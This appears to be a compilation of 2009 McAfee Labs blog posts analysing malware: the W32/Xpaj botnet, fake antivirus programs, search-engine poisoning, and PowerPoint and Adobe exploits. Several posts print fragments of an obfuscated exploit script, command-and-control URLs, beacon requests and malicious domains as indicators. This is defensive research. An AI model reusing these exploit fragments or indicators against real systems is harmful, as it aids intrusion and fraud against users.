Spammers generate more than 150 billion spam messages daily; that’s enough to send everyone in the world more than 30 emails every day (including people without computers). Nearly 19 out of every 20 emails are spam, and cybercriminals are growing more sophisticated with their attacks. No brands seem to be safe, and this month’s report analyzes how spammers are abusing the brands of Monopoly, The Hollywood Reporter, and even the Jewish organization Chabad to distribute malware.

The report can be downloaded here.

Occasionally when we analyze malware, we find hidden messages there. They can be as simple as “Hi” or some choice words that would probably cause this blog to be X-rated.

This trait is not new. And naturally we don’t make much of this habit so that the malware writers don’t earn any extra fame.

Today I was checking a family of malware, and I found another of those messages: “HELLO ANTIVIRUS MAKERS! This is XXX! Please call this sh*t YYY! Cheerz ”

Sorry, XXX. I can’t get excited about your lame YYY product. You’ll have to look elsewhere for your few minutes of fame.

Two weeks ago I blogged about a new virus–W32/Xpaj–found in the wild by McAfee researchers and actively spreading around the world. Since then we have closely monitored the change in spread and severity of the virus, improved generic detection for future W32/Xpaj instances, and added cleaning and proper repair for all the files infected by the virus. Today I want to share more news related to this threat.

Further analysis has revealed some interesting details about the malicious behavior of W32/Xpaj. The Virus is building a widespread “zombie” network, by taking control thousands of Internet-connected computers. The new botnet is in its infancy, although thousands of machines have been infected during last two weeks. The botnet infects computers around the world and has spread across many countries. The attacks are mostly aimed at enterprises, but they have now spread to consumer machines as well. Based on multiple characteristics and our own research, the virus is most probably the work of eastern European cybercriminals.

Most bots are connected to a central location from where one machine can control the entire botnet. W32/Xpaj, on the other hand, deploys several control channels to communicate and control its bots. It employs the same techniques used by Srizbi and Conficker; that is, it uses randomly generated DNS names for backup control servers. Even though W32/Xpaj does not know where the control server is, it knows how to search for it, making it possible to predict which host is in use on a given day.

To prevent botnet hijacking, W32/Xpaj accepts only digitally signed payloads and commands. Malware authors use a cryptographic hash (MD5 algorithm) to validate the authenticity of any payload received from the control server).

Our analysis has not revealed any cryptology system to protect the payload, thus there is a chance for a rival to take control of the entire botnet.

The W32/Xpaj variants we analyzed use a sophisticated domain-generation algorithm to create and query the list of random domains starting on September 24. The virus first tries to resolve the domain name to an IP address. If that succeeds, it sends an HTTP request in the form of a string:

/GET /up.php?a=g2&cm=15A91F71

The malicious host responds with the path to a binary containing further instructions and code to be executed:

http://[infected]/stamm/stamm.dat
http://[infected]/plugin/plugin.dat

The first binary containing malicious instruction has already been received by all W32/Xpaj-infected machines. The virus stores the downloaded encrypted binary in the Windows folder. After decryption, the malicious code executes and instructs the virus to gather information about the infected machine and report to the server, sending the victim’s IP address, machine name, host process, registry records, current home page, and even fonts and path variables.

Every time an infected machine receives a payload and executes malicious code, a marker (a file with a random name) is created in the Windows folder, preventing the virus from executing the same payload twice.

Botnets grow and evolve quickly. We measure them by the number of compromised computers under their control. However, proactive virus detection and following these simple recommendations will help prevent your computer from becoming a part of a botnet:

• Keep your anti-virus software up to date
• Apply all the latest security patches and keep your operating system up to date
• Set up a firewall to block unauthorized access while you are connected to the Internet. Use strict firewall policies and allow only those connections–both incoming and outgoing–that are absolutely necessary for your business.

Although many security vendors struggled to release new signatures and cleaning support for this virus, McAfee customers are already protected. You will hear a lot more from us in the coming months, so stay tuned and keep reading our blogs.

Thanks to Abhishek Karnik, Rachit Mathur, Di Tian, Ivan Teblin, and Adrian Dunbar for their help in analyzing and defeating this threat.

I am excited to be involved in the joint industry effort of defining an XML format which will allow for the rapid exchange of information between security companies. This work was done by the “Malware Working Group” operating as part of the “Industry Connections Security Group” (ICSG) and under the umbrella of the IEEE. If you Google for “IEEE” and “ICSG” you should have the link at the top of the list – IEEE ICSG .

There were about 20 people from multiple security companies who contributed to the development of the proposal for the standard and I am very pleased with the results. It is a simple, flexible and powerful format that is already being used by 4 anti-malware companies to transmit meta-data about the prevalence of malware in the field. Wider adoption of this meta-data sharing will replace the trivial malware sample exchange of the past with a real-time exchange of threat intelligence data. Communicating the relationships between malware samples, domains, IPs will open endless possibilities for improving the security of all Internet users.

For example, it will allow us to describe the whole history of domains/IPs that were used by a specific malware writing group, which malware they hosted and even how the malware got installed onto users’ computers. And this can be expressed in an unambiguous way suitable for rapid automated analysis. In a word – it’s powerful!

But there are huge benefits even in trivial transmitting of the simplest malware prevalence data:

• If you are an anti-malware vendor you will be able to prioritize samples in your research queues.
• If you are a testing organization you will be able to create more relevant test sets (for example, downgrade rare and old samples).
• If you are an administrator you can submit consolidated field reports to anti-malware vendors and help make the Internet a safer place.

Here is how a portion of the XML with meta-data looks like.

If you are interested - the complete XML schema is available here and if you want to get involved please get in touch with your current point of contact at McAfee Labs.

McAfee Labs has discovered another attempt by ruthless malware authors to profit from disaster and tragedy.

While searching for information on the earthquakes and tsunami that struck the islands of American Samoa on 29 September, I saw the following results from the Google search engine:

Clicking on one of the links, which at first sight seem to be legitimate, would result in my machine displaying an alert for a possible infection:

What is actually happening behind the scenes of my browser (in this case Internet Explorer Version 8 on a patched Windows XP system) is that the link silently connects to a server hosted in Poland that loads an exploit obfuscated with the well-known Dean Edwards packer, which I covered in a blog last year.

This is a snippet of the exploit being loaded:

eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('28 61={"174":35,"295":35,"297":35,"614":35,"298":35,"233":-1,"272":"\\36\\21\\19\\36\\21\\19\\36\\36<!---->\\21\\19\\36\\36\\21\\19 \\21\\19 \\21\\19 \\36203 755\\21\\19 \\21\\19\\36\\36\\36752 131 461\\21\\19\\36\\36\\36754 726 282 645\\21\\19\\36\\36\\36787 13 795\\21\\19 \\21\\19\\36\\36\\21\\19 \\21\\19 \\21\\19 \\36796 576\\21\\19 \\21\\19\\36\\36\\36325 794 576\\21\\19\\36\\36\\36325 181\\21\\19\\36\\36\\36572 181\\21\\19\\36\\36\\36<17 31=

And this is a snippet of an interesting part of the unobfuscated version of the exploit:

{kPromo.alerts.minimizeWindow();alert("Warning! Your PC is at risk of virus and malware attack. \r\n \r\nYour system requires immediate check!\r\nSystem Security will perform a quick and free scan of your PC for viruses and malicious programs.");kPromo.alerts.maximizeWindow()};kPromo.alerts.showWindow=
function(e,c,b){if(!kPromo.instructions.property.isInstructionActive) if(kPromo.alerts.windows[e]==undefined){var a=(typeof(kPromo.alerts.windows.length)==undefined)?"alert_window_"+
kPromo.alerts.windows.length:"alert_window_0";
kPromo.alerts.windows[e]=kPromo.layouts.createLayer(a,c,b);kPromo.alerts.windows[e].foregroundContentLayer.appendChild
(kPromo.document.getDocumentElementByID(e));
kPromo.alerts.draggableItem.div=kPromo.alerts.windows[e].


The exploit in turn connects to a server hosted in China that downloads (with user interaction) an executable that turns out to be yet another variant of the fake anti-virus software Windows PC Defender. For details of that software, you can see a recently published VIL here.

After just a few minutes of the malware running, information such as the Windows Product ID and the Windows License Key on the system are sent to a server hosted in Russia.

It’s amazing how fast and well-prepared malware authors are nowadays. They seize opportunities that arise to exploit not only our machines but also our trust and confidence in the news. They make use of well-known techniques (such as search-engine optimization) strengthened by people’s emotions toward world-wide tragic events that are followed by millions (who are themselves victims of a lesser tragedy).

Recently, we analysed samples of a new fake anti-virus program that brands itself as Alpha Antivirus. This program uses the following filenames: alphaav.exe and msnaoladdon.dll.

Alpha Antivirus is a new FakeAlert variant evolved from the Personal Antivirus family of rogue anti-virus software. Like many FakeAlert malware, Alpha Antivirus promotes itself through the use of pop-up web pages hosted on malicious websites. These web pages mimic a Windows Explorer folder and a Windows Security Alert dialog, and perform a free but fake online scanning of the affected system.

The following domains were known to host the fake online-scanning web pages and the main executable of Alpha Antivirus:

• mycompinfo17.com
• internetantivirusproscanner.com
• mycomputeronlinescan11.com
• internetsecurityscan.com
• mycompscanner07.com
• mycompscanner42.com
• internetantivirusproscan.com
• windowsdefenderupdate5.com
• securitybugfixupdate6.com

The software prompts the user to install Alpha Antivirus. Once executed, it launches fake scanning and reports multiple infections:

It also displays misleading pop-up warnings on the Windows taskbar.

This variant drops a copy of itself as %ProgramFiles%\AlphaAV\AlphaAV.exe and a msnaoladdon.dll component in the Windows System folder, and installs the DLL file as a browser helper object.

(%ProgramFiles% refers to the Programs folder, for example, C:\Program Files.)

AlphaAV.exe is detected as FakeAlert-DI, while msnaoladdon.dll is detected as FakeAlert-EQ.

Frequently, we see abrupt changes in branding, filenames, and GUIs used by the same fake anti-virus programs. As more security vendors and researchers publish their findings about new rogue anti-virus programs, malware authors try to repackage their “products” with new brand names and filenames and try to use more obfuscation and encryption on their files in an attempt to avoid being recognised by users and in some cases evade detection by security vendors.

Some known brand name and filename changes:

1. From pav.exe + winexplorer.dll to personalav.exe + msxmlm.dll. (Personal Antivirus), and again to alphaav.exe + msnaoladdon.dll (Alpha Antivirus)

2. From frmwrk32.exe to winupdate.exe (Antivirus XP/Pro)

3. From pcdef.exe + mousehook.dll + ntdll64.dll (WinPC Defender) to winav.exe + ieocx.dll + iehostcx32.dll (WinPC Antivirus)

4. From Spyware Protect 2009 to Antivirus System Pro

As a gentle reminder to all users: Avoid visiting untrusted websites, install anti-malware products only from trusted and legitimate sources, and update the DATs regularly.

The use of social engineering to grab attention of recipients and to deliver malware is not something novel. The latest trend in spreading malware is to manipulate a happening celebrity story, disaster or other high profile news event. The threat could be delivered as emails or poisoned search engine results which leads to malware. In the past, we have come across innumerable incidents like Michael Jackson demise or Benazir Bhutto assassination used as an arena to spread malware. Lately, we have observed an increase in the number of OLE files being used as targeted attacks against various high profile users.

The exploit and lure claims to contain information on the Pakistani Air Force and arrives via email as a PowerPoint document attachment. When an unsuspecting user having a vulnerable version of PowerPoint launches the document, the vulnerability is exploited and the malicious payload is executed.

The vulnerability is with a malformed record within PowerPoint which can be exploited to execute malicious code. The shellcode makes use of the Process Environment Block (PEB) approach to determine the kernel32.dll base address as shown in the figure below.

Upon executing the file in a vulnerable version of PowerPoint, the shellcode decrypts itself and executes the malicious binary.

The malicious PPT file is exploiting an older vulnerability which was patched by Microsoft in ms06-028 bulletin. This attack is detected with the current DATS as Exploit-PPT.h and the dropped malicious executable is detected as BackDoor-EFB.

Nowadays, most anti-virus products can deal with viruses relatively easily using a variety of technologies. Decent emulator-based scan engines can handle a majority of polymorphic and metamorphic viruses, including those that use the entry-point obscuring technique (EPO). But when it comes to viruses with delay load and random code blocks insertion such as W32/Zmist, (a.k.a. Mistfall) code emulators are not the best approach. We recently came across a new W32/Xpaj variant that is actively spreading. It utilizes well-known techniques to evade detection that are otherwise seldom found in live virus analysis.

The new W32/Xpaj uses a random code block integration technique to infect files. It does not change the original entry point of the file. Instead, W32/Xpaj builds several code blocks responsible for different functionalities and moves them into random locations throughout the code section of the infected file. It is similar to what W32/Zmist used to employ, but W32/Xpaj uses code replacement instead of code insertion.

Its polymorphic decryptor is represented by a number of code blocks linked by unconditional jumps. Once executed, the polymorphic decryptor gains control and performs different tasks:

1. Saving the original state of the infected application and preserving all the registers used by the virus
2. Changing the protection flags of the memory where the virus body is located
3. Decrypting the virus body
4. Jumping to the decrypted virus body, etc.

Each task may be located in a separate block of code or combined in one big block.

Once decryption is done, control passes to the main virus body, usually located in a different section. Its authors decided to use register-based jumps instead of relative jumps. The former, together with a heavily encrypted virus body and stolen functions, make this new variant more complicated to repair:

In an attempt to make sure the virus is executed at least once, W32/Xpaj searches and replaces a number of call instructions to point to the beginning of one of the virus code blocks created during the infection.

The random location of the polymorphic code blocks means that for some samples, code emulators may never reach the viral instructions. Such samples may present a hidden surprise to some anti-virus vendors, which might not be able to detect all instances of W32/Xpaj, missing a certain percentage of infected files. However, in other cases, the virus may never gain control at all, such as in the following samples found in the wild:

• 4843998e3564ac1a1e137149bc3ce28e
• 8e4260d0a29c0133bad3bc0e39057456
• db4fff8a4a21e9c824cde3ebd151fbf2

While decrypting the virus body, W32/Xpaj may generate millions of iterations. Code emulators without decent support of dynamic code translation may fail to run it through correctly. It integrates itself into infected files and becomes a part of the host program control flow. Original functions replaced with the virus decryptor are saved, encoded, and are located in the same section with the virus body.

This variant of W32/Xpaj increases the virtual size of the section containing the virus body by 150KB. It is heavily obfuscated and contains functionality to receive further instructions from remote servers:

• tooratios.com (82.98.235.66)
• abdulahuy.com (82.98.235.66)

The server is currently active and located in Belgium, and sends instructions through the following file:

• hxxp://abdulahuy.com/{blocked}/stamm.dat

Interestingly, the malware authors decided to monitor its own virus activity and included logging support to this beast. Every file infected with W32/Xpaj reports to the above-mentioned server and sends information about the system (OS version, Service Pack, IP, etc.) on which the infected file is running:

os=00000005.00000001.02000B28 & amp;cm=18B51294&adn=A120BB0F & amp;knv=00000012 & amp;hdd=002F606E & amp;cid=0000000C & amp;vvr=00000001

The majority of AV vendors do not currently detect this W32/Xpaj variant (as seen in these VirusTotal results):

I revisited the topic of search-engine manipulation (a.k.a. blackhat SEO) in two recent posts. Something caught my eye while investigating cases of search-result poisoning–a shift away from tactics used by the attackers earlier in the year.

Previously, attackers mostly registered free websites to pull off their attacks. They would create a bunch of new sites, cross-link them, and use other tricks to get their pages indexed and ranked high on relevant search result pages (again, largely targeting the most popular search terms of the day, such as those found on Google Trends.) I blogged earlier in the year about how the user forum on democrats.org was leveraged to link a high-ranking site with newly created malicious sites.

It seems now that attackers are combing various elements of different attacks to achieve blackhat SEO.

There are currently many examples of high-ranking poisoned results that lead to compromised legitimate sites. This is a bit different than in the past, as now security vulnerabilities are being exploited simply for the sake of search-engine manipulation. 

Historically we’ve seen attackers upload malicious content to compromised sites, either directly by injected exploit code, or indirectly by injecting an iframe or script that brings in exploit code from a remote site.  Such situations can lead to site users notifying the compromised site administrator that they were attacked while visiting that site. Redirecting victims to a completely different site can help conceal the poisoned site.

The attackers go a step further by implementing a well used trick, which is to redirect conditionally.  It’s not enough for people to go to a compromised page; they must arrive there from a search-result page. In other words, users (or site admins) navigating to http://compromised-site.com/attacker_created_page will not be redirected to a payload site unless they are coming from a Google search-result page. 

Some of the compromised sites are running older, vulnerable phpBB and Word Press applications.  Others sites are serving attacker HTML pages, perhaps from compromised admin/user credentials or misconfigured web servers.

These events further blur the line between “trusted” sites and malicious content. This trend is likely to continue for years to come.

“Illusion is needed to disguise the emptiness within.” – Arthur Erickson

I thought this was the perfect quote for fake anti-malware software or FakeAlert threats. FakeAlert malware imposes an illusion of protection on its users, but all thats within is an empty hollow inside. It has become a common sight for malware to be spoofing program file resources such as icons or company information from other legitimate software. One of the most spoofed resources are Microsoft file properties such as company information or icons from programs “calc.exe”, “notepad.exe”, even Windows folder icons. Why would they do this ?

It is easy for less- computer-savvy users to trust that a program is legitimate based on visible features of a file, such as its icon or file properties. Its a nice facade for malware to slip through. We recently came across a FakeAlert threat that attempts to disguise itself as a McAfee product using a spoofed McAfee icon. Perhaps FakeAlert malware authors are taking notice of McAfee as one of the world’s most trusted security companies.

Call it social engineering or just another sneaky attempt to get by. The bottom line is, looks are deceptive so don’t trust everything you see whether its a resource icon or company information in the file properties. This FakeAlert malware that brands itself  as “AntiVirus Pro 2010” is all but a spin off of FakeAlert-XPSecCenter (aka WinreAnimator amongst its many re-branded names).

The following are some updated snapshots of FakeAlert-XPSecCenter:

Please beware of this FakeAlert variant and it is not in any way related to McAfee products. Safe Surfing !!

Wouldn’t you know it. Just the other day I blogged about rogue anti-virus software makers selectively targeting certain hot search terms. Since then the majority of top terms lead to poisoned links within the top 10-20 search results.

Recently there have been some news stories about attackers targeting specific topics or terms, but from what I’m seeing they are pretty indiscriminate. It doesn’t matter what the topic is. If people are searching for it, then the bad guys want to poison the results. The speed at which these links appear suggests the operation is largely automated. 

Here’s one example for bengals blackout. One potential way of identifying a bad link is if the title is exactly the same as search term, it’s in all-capital letters, and the URL contains the search terms as well. The summary usually contains the text you’d expect to find from a news story. This is not a foolproof way to call something bad, but it’s a strong indication that something might be fishy.

Search safe.

Today we released the new version 2.1 of McAfee FileInsight. You can download your free copy from the Avert Tools site. FileInsight is a handy integrated tool environment for web site and file analysis. Hex editing, syntax highlighting, and it comes with several built-in decoders, built-in calculator, a disassembler, JavaScript scripting support, a Python-based plugin system and many more.

Let’s go through some stages of an exemplary malware attack to highlight some of its analysis features – but don’t try this stunt at home, unless you know what you’re doing; a safe, isolated lab environment is absolutely mandatory for any such research work.

The above screen shows the initial malicious web site, trying to determine your browser and redirect to one or more respective exploits of choice. One of them being an exploit for the Microsoft DirectShow Video ActiveX Control Vulnerability (MS09-032) (stopped as “Exploit-MSDirectShow.b” by McAfee Virus Scan and as “BehavesLike.Exploit.CodeExec.EBEO” by McAfee Gateway Anti-Malware).

Getting to the actual shellcode takes some JavaScript unpacking steps. The JavaScript code is spread over several script files and custom encoded. In the above screen, we take that malicious code into FileInsight’s Scripting window and let it deobfuscate there.

Once we’re down to the shellcode level, we can directly look at the shellcode in the built-in disassembler. The Disassembler window also features recursive traversal to come up with branch labels automatically. It CALLs-to-POP in order to determine actual memory location of the obfuscated payload, sets up and loops to decode the payload, and then executes that in order to download a XOR-obfuscated executable that turns out to be a UPX-packed backdoor (stopped by Artemis and by McAfee Gateway Anti-Malware as „LooksLike.Win32.Suspicious.C“). Advanced users may also want to look into FileInsight’s Python-based plugin system, but be warned: writing plugins at the overwhelming simplicity of the Python language has a certain addiction potential!

FileInsight is available here.

The recent onslaught of “Chinese pharmacy” spam and the DDoS attacks that took down Twitter, Facebook, and others have caused a frenzy of speculation about the Chinese government’s involvement in spam generation and acts of cyberterrorism. McAfee’s September 2009 Spam Report debunks these rumors and gets to the root of the cause.

The report reveals the truth behind the “Chinese pharmacy” spam:

• “Chinese pharmacy” spam appears to be the result of a need for regional pharmaceutical companies to offload excess drugs internationally, as selling excess drugs inside the country violates Chinese law. We just don’t believe this month’s onslaught is a sinister government plot.
• Spam originating from China can often make up between 60 percent and 65 percent of today’s global email volume
• “Chinese newsletter” spam emails were the leading type of pharmaceutical spam, with a total of 52,428 emails that contained 1,235 unique URL domains in a single day
• If excess drugs in China cannot be sold into the legal market due to Chinese law, then they will continue to be sold on the black market

Furthermore, the report uncovers findings that have surfaced since the August 6 DDoS attacks:

• The August 6 spam campaign, launched in conjunction with the DDoS attacks, was not solely responsible for the downfall of the social networking sites and, in fact, was likely a mere afterthought of the attacker
• The August 6 DDoS and spam attack was intended to target a pro-Georgian blogger, and was likely part of an intimidation campaign in retaliation for his political blogs
• Brazil, Turkey, and India were among the top three domains from which infected machines spread the August 6 spam campaign in conjunction with the DDoS attack

Check out the full report here.

It’s been a while since I blogged about Google Trends being abused to serve malware. However, recent attention around Google search poisoning led to me to check on things. It seems the attackers are being more selective in the search terms that they target–favoring those that have something to do with computer security. Hunting for poisoned search results based on random hot-search terms is hit or miss (and more miss than hit, at least in the top 10 results being poisoned). But terms that contained virus, trojan, rogue, and bulletin all lead to poisoned top search results. Some even lead to pages and pages of bogus links, which redirect to rogue anti-virus malware.

The following image is not intended to show the actual text of the search results, but rather it highlights the fact that four out of the top fifteen results are poisoned for one of today’s most searched terms at the time of this writing:

Starting from result number 20, the situation gets much worse–with dozens of poisoned results:

Granted, the link names on the second batch of results have nothing to do with the trojan search term I used. However, the attackers have set up thousands of pages that cross-link to each other, and contain various hot-search terms and content. So even if the long tail of poisoned results on any search term has a low conversion rate for that term, it can still serve to boost the score of other pages and terms that have a higher conversion rate.

Once a search user takes the bait, it’s business as usual for the attackers:

Graphic displayed while web page loads

Bogus warning message displayed from web page

Simulated system scan displayed from web page

Bogus scan results displayed from web page

Update of September 3:

Some detections of this Trojan were on a component of a commercial application. For this reason we’ve updated the detection type to “potentially unwanted program” (PUP). Customers who see files that exhibit the behavior discussed in the Threat Library for QTaskMgr-1 should submit the file to McAfee Avert Labs.

In anti-virus research, context is everything. We had a sample that was not signed correctly and behaved suspiciously. We have to think of our users security; thus we detected the file. Without knowing that the sample was part of a nonmalicious application, we had to assume it was dangerous.

One reason we make this assumption is due to cases such as files infected with Induc. Here, even if the binary’s resources check out, it’s still compromised. If it looks bad, smells bad, tastes bad, and you’re not told otherwise—then it probably is bad.

Original blog, published September 1:

We’ve heard about malware that reduce a computer’s state of security. These malware might, for instance, disable your access to the registry, lower Internet Explorer’s security configuration, delete system files, or manipulate the system’s DNS settings. Each of these steps exposes the victim to graver malware infections or system compromise.

Yesterday we ran into a Trojan that weakens the victim system’s security by making registry changes. The malware disables Task Manager, Windows Update, and toolbars in Internet Explorer. Further, it does not let you lock your machine or change your password. If you pressed Ctrl+Alt+Del after the infection you would see this:

Because losing Task Manager is the most damaging security attack on our list above, we’ve called this Trojan QTaskMgr-1. We include detection and cleaning for QTaskMgr-1 since the 5727 DATs, released September 1.

Many major security companies are about to release their new retail product for 2010. Expect some comparative reviews in the next months, check what you need and stay protected.

Some ‘2010’ products are already out on the web, but unfortunately most of them are FakeAlert Trojans or Scareware.

Once downloaded, you see pop up windows alerting you about a malware found on your machine and asking you to buy the product. The actual problem is the software you just executed.

We have been reporting about FakeAlert Trojans before – you may remember some products named:

- “Virus Remover 2007”
- “Win AntiSpyware 2008”
- “AntiVirus VIP”
- “AntiSpyware Pro2009”
- …

To name just a few, but let’s look at this “2010” example:

Before you think about buying a new product or testing a trial version, you should:

- Use McAfee SiteAdvisor to get a rating of the page you’re looking at.
- Type the product name into your favorite search engine and have a look.
- Check comparative reviews – don’t believe in the awards posted on the page.
- Still unsure? Go to the next store and buy a box. There are no FakeAlert products available as box in a store. They sell online only.

If you are already running an AntiVirus product from a known vendor and you get annoyed by popups, bogus alerts or have a different issue, contact the Technical Support first.

Quote from the bottom of the screen:

According to security experts, most spyware types are not detected by antiviruses because they are disguised as legitimate software installed with the user’s consent.

Actually, ‘PC Antispyware 2010’ is a perfect example for such a “malicious software disguised as legitimate software”.

Of course, we and other major security companies do add detection for those Fake Alert products as Trojan.

McAfee SiteAdvisor rates this page as RED.
McAfee VirusScan detects the installer as Generic FakeAlert.d!gen
McAfee Secure Gateway detects Trojan.Dldr.FraudLo.sxm

It has now been widely reported that Apple’s latest operating system, Snow Leopard contains the ability to identify two families of Mac malware–OSX/Puper and OSX/IWService–when the infectious DMG files are downloaded and mounted as part of the infection process.

There are a number of ramifications of such a move that could be discussed, but the intention of this post is to call out the possibility of this being a catalyst for more Mac malware to be created.

As previous noted on our blog, the growth rate of malware (notably PC malware) is partly due to the success of defenses; the bad guys react and pump out more and more malware in an effort to circumvent those defenses. Apple’s inclusion of malware identification into the OS could certainly be a catalyst for a more intense game of cat and mouse with virus authors, an ironic scenario should this come about.

I like to pick on malware writers, especially the dumb ones as you can see here. Sometimes they’re just too big a target to ignore.

The latest round is with Brazilian malware writers again. As you are aware, some days ago the Delphi virus was discovered; we detect it as W32/Induc. So today I got a Brazilian PWS-banker malware that was infected with–guess what?–the W32/Induc delphi virus! What an irony.

Back in 2007, I wrote about something quite similar here. And, surprise, it was another Brazilian PWS-banker malware.

So, please, malware writers, repeat after me: “I must install anti-virus software. I must install anti-virus software.”

Today, you can buy a customized Brazilian PWS-banker malware for about US$50. That may explain why it is so cheaply made.

The W32/Induc virus has been in the wild for at least a year. During this period it has succeeded in infecting a lot of Delphi installations, including manufacturers of some pretty popular software packages.

On a victim’s machine this virus searches for the presence of a specific version (4.0, 5.0, 6.0 and 7.0) of the Delphi compiler. The virus gathers this information using the registry entry below.

If it finds one of these versions, the virus inserts its code into the file SysConst.pas, which is present in x.0\Source\rtl\sys. The virus renames the current Sysconst.dcu, which is present under the Delphi library folders, to SysConst.bak. The SysConst.pas file containing the viral code–like the one shown below–is complied using the Delphi command line compiler dcc32.exe to create an infected SysConst.dcu. The original SysConst.pas file is then deleted.

McAfee detects all files that have been compiled with the infected Delphi program as W32/Induc. Some customers have contacted us suspecting that this result is a false positive, but this is known correct detection from McAfee.

This virus does not have a malicious payload. It just spreads through the compiled executables.

Agreement and collaboration have been two of the greatest challenges the security community has faced from the very beginning. In an effort to address this, The Industry Connections Security Group (ICSG), a new offering from the IEEE, allows like-minded companies to come together to solve industry or business problems that center on information security. Industry Connections is a program under the IEEE that allows for a fast start-up toward industry collaboration. It also offers the support and infrastructure of an established and well known brand—the IEEE itself. This effort will allow the group to focus on the work of security standards and problem solving, rather than being slowed down with issues such as incorporation or intellectual property matters. McAfee is proud to be a founding member of this effort.

The ICSG is a group of computer security organizations that will work together on common goals and industry issues. The key focus of our collaboration is to solve security issues. In the past few years, attackers have shifted away from mass distribution of a small number of threats to micro distribution of millions of distinct threats. ICSG was established, under the umbrella of the IEEE Standards Association (IEEE-SA) Industry Connections program, out of the desire by many of us in the security industry to pool our experience and resources in response to the systematic and rapid rise in new malware being introduced to the market. The bad actors have been able to leverage the underground economy and scale their efforts, they have access to specialist tools and services, and they collaborate and communicate effectively—whereas the security industry has been generally responding to threats as individual entities.

Although there has been some ad-hoc cooperation in the industry in areas such as malware and phish URL sharing, this cooperation has not been standardized or documented in a format that lends itself to systematic improvement in operational efficiency or visibility, or review by people outside the vertical industries. It is this collaborative and communicative gap that the ICSG looks to close. ICSG has been established to look at and deal with a wide variety of security issues in a forum that allows us to engage all types of industry verticals. We also anticipate that we can work with other efforts to help drive security standards in other areas.

ICSG currently has one team, the Malware Working Group, looking at malware, but the organization will add more as needs evolve. Malware growth has been meteoric for the last several years. As such, the Malware Working Group’s primary goal is to solve some of the malware-related issues the industry faces today. The initial focus will be to establish more intelligent ways of sharing malware samples and the information associated with them to make the computer security industry more effective at combating this ever-evolving threat.
The initial members of ICSG are McAfee, Microsoft, Symantec, Sophos, AVG, and Trend Micro. A number of other individuals have been involved in reviewing the initial document produced by the Malware Working Group, from a variety of companies involved in computer security. If you are looking to join or need info, contact us at:

• joinICSG@ieee.org, joinICSGMal@ieee.org, IndustryConnections@ieee.org

Procedures and policies that have been adopted can be viewed here. Information about the Malware Working Group can be found here.

While Dmitri Alperovitch wrote his blog entry about the recent DDoS attack against Twitter and some other platforms hosting accounts of a pro-Georgian blogger nicknamed cyxymu, I browsed the Internet, searching for malicious websites taking advantage of this topic.

In second place in my google search request, I was attracted by a link proposing to add the blogger to my friends. This link was a lure redirecting me on a site promoting a fake anti-virus product.

Once again, we did not have to wait long before encountering such sites taking advantage of the news.

Today we released our Q2 Threats Report. Some old trends have continued. Some new trends and threats have been established, and some old “friends” have even outdone themselves. Spam volumes have increased 141 percent since March, continuing the longest ever streak of increasing spam volumes. We also highlight the dramatic expansion of botnets and the threat from AutoRun malware.

More than 14 million computers have been enslaved by cybercriminal botnets, a 16 percent increase over last quarter’s rise. The report confirmed our first-quarter prediction that the surge in botnet growth would send spam levels to new heights, surpassing their previous peak in October 2008 before the takedown of the spam-hosting ISP McColo.

Our researchers also found that over the course of 30 days AutoRun malware had troubled more than 27 million files. AutoRun malware, which exploits Windows’ AutoRun capabilities, does not require any user clicks to activate, and is most often spread through portable USB and storage devices. The rate of detection surpasses even that of the infamous Conficker worm by 400 percent, making AutoRun one of the most prevalent pieces of malware in the world.

Some of the other areas we cover and discuss:

Cybercrime as a Service
As the number of botnets continues to grow, malware writers have begun to offer malicious software as a service to those who control these bots. By exchanging or selling resources, cybercriminals distribute new malware to wider audiences instantaneously. Programs like Zeus–an easy-to-use Trojan creation tool–continue to make the creation and management of malware even easier.

Cybercriminals Target Twitter, Social Networks
Twitter’s growth in popularity has made it a new target for cybercriminals in the last three months. Malware like the “Mikeey” worm and new variations of the Koobface Trojan attack users through tweets and abbreviated URLs. Spam Twitter accounts are becoming increasingly prevalent. Twitter administrative accounts have also been hacked on multiple occasions, giving cybercriminals access to the private accounts of celebrities and politicians, such as Britney Spears and Barack Obama and even allowing for the publication of sensitive internal strategy documents on the Web. Facebook and MySpace remain strong attack vectors for cybercriminals. In May, spam messages on social networks pointed users to more than 4,000 new Koobface binaries!

To view the McAfee Q2 Threats Report, go here.

Following up on the recent post by my colleague Dave Marcus concerning malware growth, the guys from AV-Test in Germany just released their updated stats. To avoid confusion when comparing the different numbers, here’s a quick explanation of the different counts:

AV-Test counts unique binaries. Unique means different cryptographic hashes. So the same Trojan, obfuscated with 10 different packers results in 10 unique binaries. This is often due to the impact of server-side polymorphism, where you get a unique binary every time you download a file.

Our outbound counting, as used by Marcus, counts the threats for which we have to create a driver for detection. If in the example above we are able to look beneath the obfuscation layer of the packers, the 10 different binaries would be counted as just one Trojan. In addition to that, we frequently use generic detection, in which a single count could hit on thousands of minor variants.

Now that the different ways of counting may be a bit clearer, let’s look at the bad news:

AV-Test’s count has come close to 22,000,000 samples in June.

(Click here for a larger image.)

This by itself is disturbing, but the really disturbing trend is visible when we look at the growth month over month:

(Larger image here.)

The growth has been fairly constant over the last year but this has changed now.

We are now seeing a major increase in the monthly growth, topping one million new samples each month in AV-Test’s count. And this time it’s not only samples (the same piece of malware packed over and over again) but also actual new malware. If you look at Marcus’ numbers again–growth in 2009 has nearly tripled compared with 2008 and remembering that we count malware rather than samples–this indicates there has been a shift recently in malware production. Tons of new Trojans have been developed and released on top of the reused stuff.

So keep your machine updated, not just AV and the OS but all applications. Watch out where you surf. (SiteAdvisor may help you there.) And take care what links or attachments you trust in emails and all other forms of messages. All this will help you enjoy the summer!

As we already mentioned multiple times in the past, exploits that take advantage of newly discovered holes in popular applications represent a growing threat to Internet users. Many, if not most, computer systems are vulnerable to these attacks. More evidence shows zero-day attacks remain the preferred choice of cybercriminals.

Today, a new unpatched Adobe vulnerability has been discovered in the wild. It takes advantage of a new feature to add interactive Flash (SWF) content into PDF files. This bug was found to affect at least Adobe Reader and Acrobat 9.1.2 , as well as Adobe Flash Player 9 or later.

In our investigation of the issue, we found that Acrobat 9 introduced a new “Rich Media” annotation type, which uses Acrobat’s built-in Flash Player to play SWF content. In the current attack, specially crafted SWF files were embedded into PDF documents. These can cause Adobe Reader to execute arbitrary code when viewed. When successful, shellcode in the exploit is executed by Adobe Reader. The picture below depicts how the shellcode works and what it does:

